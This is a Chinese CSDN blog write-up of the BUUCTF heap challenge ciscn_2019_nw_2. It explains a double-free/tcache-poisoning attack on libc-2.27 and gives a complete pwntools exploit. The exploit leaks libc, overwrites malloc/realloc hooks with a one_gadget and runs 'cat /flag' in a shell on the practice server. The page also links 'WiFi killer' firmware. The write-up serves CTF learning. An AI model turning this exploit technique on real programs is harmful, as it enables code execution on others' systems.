[BUUCTF-pwn] ciscn_2019_nw_2

最新推荐文章于 2024-07-20 17:12:48 发布
最新推荐文章于 2024-07-20 17:12:48 发布
阅读量255 收藏
点赞数
分类专栏: CTF pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121023156
版权

[BUUCTF-pwn]— ciscn_2019_nw_2

  1. 题目地址: https://buuoj.cn/challenges#ciscn_2019_nw_2
  2. checksec看保护-全开(堆题都一样可以不看)
  3. 菜单:只有add和free 且free未删指针有明显的UAF,而且是ubuntu18对应的libc-2.27版本可以直接free*2
  4. free限制了次数3
  5. add分两部分一个8字节一个68,这样可以独立修改fp的一部分
  6. 网上没搜到exp

#先获取libc
只能free 3次,且块大小固定为0x70所以需要解决两个问题,一是要生成个环(fastbin_attack),二是要一直保留
##先建11次块
将来让第0来修改1块size为0x481,加上防止与top chunk合并的块共11个
##fastbin attack
两次free0在chunk0成环,然后通过修改末位将fp指到chunk1-0x20处.(虽然块为80但只让写70,所在chunk1-0x10无法写入pre_size这个位置)
建两次将块建到chunk1-0x20处,覆盖chunk1.size为0x481,然后free得到libc
注意这里写入时带上chunk1-0x20处这个堆地址,让这里依然保留环,因为3次free已经用完了
##再次fastbin attack
上一步在chunk1-0x20保留了一个环,现在可以写入realloc_hook的地址(libc-2.27不检查头标记,不用错位,爽)
然后在realloc_hook写入one_gadget
在realloc_hook写是防止需要调栈的情况下在malloc_hook写realloc用,本题可以直接在malloc_hook写

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
    one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
else:
    p = remote('node4.buuoj.cn', 26553) 
    libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
    one = [0x4f2c5, 0x4f322, 0xe569f, 0xe5858, 0xe585f, 0xe5863, 0x10a398, 0x10a38c]

elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

menu = b'>> '
def add(title, msg):
    p.sendlineafter(menu, b'1')
    p.sendafter(b"title:\n", title)
    p.sendafter(b"content:\n", msg)

def free(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"index:", str(idx).encode())

#正文
[add(b'a', b'b') for i in range(11)] #[0,10]
free(0)
free(0)
add(b'\xc0',b'AAAA') #11 260 n 260
heap_addr = u64(p.recvuntil(b' AAAA', drop=True).ljust(8, b'\x00'))
print('heap:', hex(heap_addr))
add(b'\x60',b'A'*0x50 + p64(0x81) + p64(heap_addr)) #12 260 n 2c0 在2c0预存指针
add(p64(heap_addr),b'\x00'*0x10 + p64(0x481)) #13 2c0 n 2c0  在2c0再建个环
free(1)
#建块,带出0x20处的main_arena+0x60
add(p64(heap_addr),b'A'*0x18) #11 2c0 n 2c0
malloc_hook = u64(p.recvuntil(b'\x7f', drop=False)[-6:].ljust(8, b'\x00'))- 0x60 -0x10 
libc_base = malloc_hook - libc_elf.sym['__malloc_hook']
free_hook = libc_base + libc_elf.sym['__free_hook']
system = libc_base + libc_elf.sym['system']
one_gadget = libc_base + one[7]
realloc = libc_base + libc_elf.sym['realloc']
print('libc:', hex(libc_base))
add(p64(malloc_hook - 8),b'A') #2c0 n 2c0
add(p64(malloc_hook - 8),b'A') #2c0 n malloc_hook-8
add(p64(one_gadget),p64(realloc)) #realloc_hook:one[7], malloc_hook:realloc 
#建块,得到shell
p.sendlineafter(menu, b'1')
p.sendline(b'cat /flag')
p.interactive()

新开的博客记录一下
处写,别嫌

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mrctf2020_easyoverflow
m0sway的博客
12-13 344
mrctf2020_easyoverflow 使用checksec查看: 保护全开!!! 放进IDA中看下: 大致逻辑: 用户输入的变量v4 v5有定值 调用check()函数传入参数v5 check(v5)为true就调用system("/bin/sh") 跟进check()函数查看: 思路明了,只需要v5 == fakeflag就能getshell,跟进查找fakeflag的值 再回来看输入点: v4在var_70 v5在var_40 gets()函数不限制输入,那么可以输入v4时溢出到
ciscn_2019_en_2
m0sway的博客
03-25 1594
ciscn_2019_en_2 WriteUp BUU_PWN
pwnciscn_2019_es_2
Nothing
12-24 2763
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4863
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
CTF pwn题堆入门 -- Tcache bin
lifanxin的博客
04-06 3927
Tcache attack序言概述攻击方式绕过Tcache分配堆到目的地址tcache poisoningtcache house of spirit总结 序言 无奈于pwn题中与堆相关的东西实在是比较多,加上到了2021年的现在,ctf比赛中一来就是堆题,还都是新版本libc,对我这种新手中的新手实在不太友好,以此写下这个系列文章,记录自己学习堆漏洞利用过程中的点滴,同时也是个总结吧。结合自己做题的理解,将堆攻击常见的手段和方式按照一定的规律记录下来。本文章系列将分成五大块,即tcache attack
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5133
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
使用Python的Turtle库绘制动态风车
最新发布
爱写代码的小朋友
07-20 191
python绘制风车
华为od机试真题 — 代表团坐车(Python)
学习,你不是一个人在战斗 ~ 961302305(QQ,微信)
07-17 596
【华为od机试真题 】代表团坐车(Python) 某组织举行会议,来了多个代表团同时到达,接待处只有一辆汽车可以同时接待多个代表团,为了提高车辆利用率,请帮接待员计算可以坐满车的接待方案输出方案数量。
Python如何将字符串连接在一起并使用`join()`方法】
qq_36253366的博客
07-19 261
方法是字符串对象的方法,而不是列表或元组等序列类型的方法。因此,你需要先指定一个用作分隔符的字符串,然后调用这个字符串的。方法将字符串连接在一起,你需要首先确保这些字符串被存储在一个序列类型中(如列表或元组),然后调用这个序列的。方法是一个字符串方法,它用于将序列(如列表、元组等)中的元素以指定的字符连接生成一个新的字符串。列表中的所有字符串元素使用空格作为分隔符连接成一个新的字符串。方法,并将你想要作为分隔符的字符串作为参数传递给。方法,并将包含要连接字符串的序列作为参数传递。
IPython 日志秘籍:%logstate 命令全解析
2401_85812026的博客
07-17 581
logstate命令是 IPython 日志系统的重要组成部分,它帮助我们掌控日志记录的状态。通过本文的介绍,你应该对如何在 IPython 中使用%logstate查看日志状态有了更深入的理解。记住,合理利用日志系统,可以让你的数据探索过程更加透明和可追溯。本文详细介绍了 IPython 的%logstate命令,包括其基本概念、基本用法、输出解析以及实战示例。希望本文能够帮助读者更好地利用 IPython 的日志系统,优化数据探索和科学计算的工作流。记住,掌握%logstate。
Python每日一题:回文数
xiongxiaoxuan的博客
07-16 288
回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。例如,121 是回文,而 123 不是。给你一个整数 x ,如果 x 是一个回文整数,返回 true;否则,返回 false。解释:从左向右读, 为 -121。从右向左读, 为 121-。因此它不是一个回文数。先将整数x转化为字符串形式,判断x和它的反转形态是否完全相等。解释:从右向左读, 为 01。需注意:True和False首字母大写!提示:-231
Python 中的内存管理有哪些优缺点】
qq_36253366的博客
07-19 348
Python中的内存管理是一个复杂而高效的系统,它通过自动化和抽象化的方式极大地简化了程序员的内存管理负担,但同时也存在一些潜在的缺点。
JAVASE进阶day11(IO流(字符流),编码格式,序列化)
qq_65095414的博客
07-16 156
【代码】JAVASE进阶day11(IO流(字符流),编码格式,序列化)
批量下载网易云音乐歌单的Python脚本
qq_43580271的博客
07-17 1235
同时,这也展示了如何利用Python在日常生活中解决实际问题的能力,希望这个小技巧对你有所帮助!
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值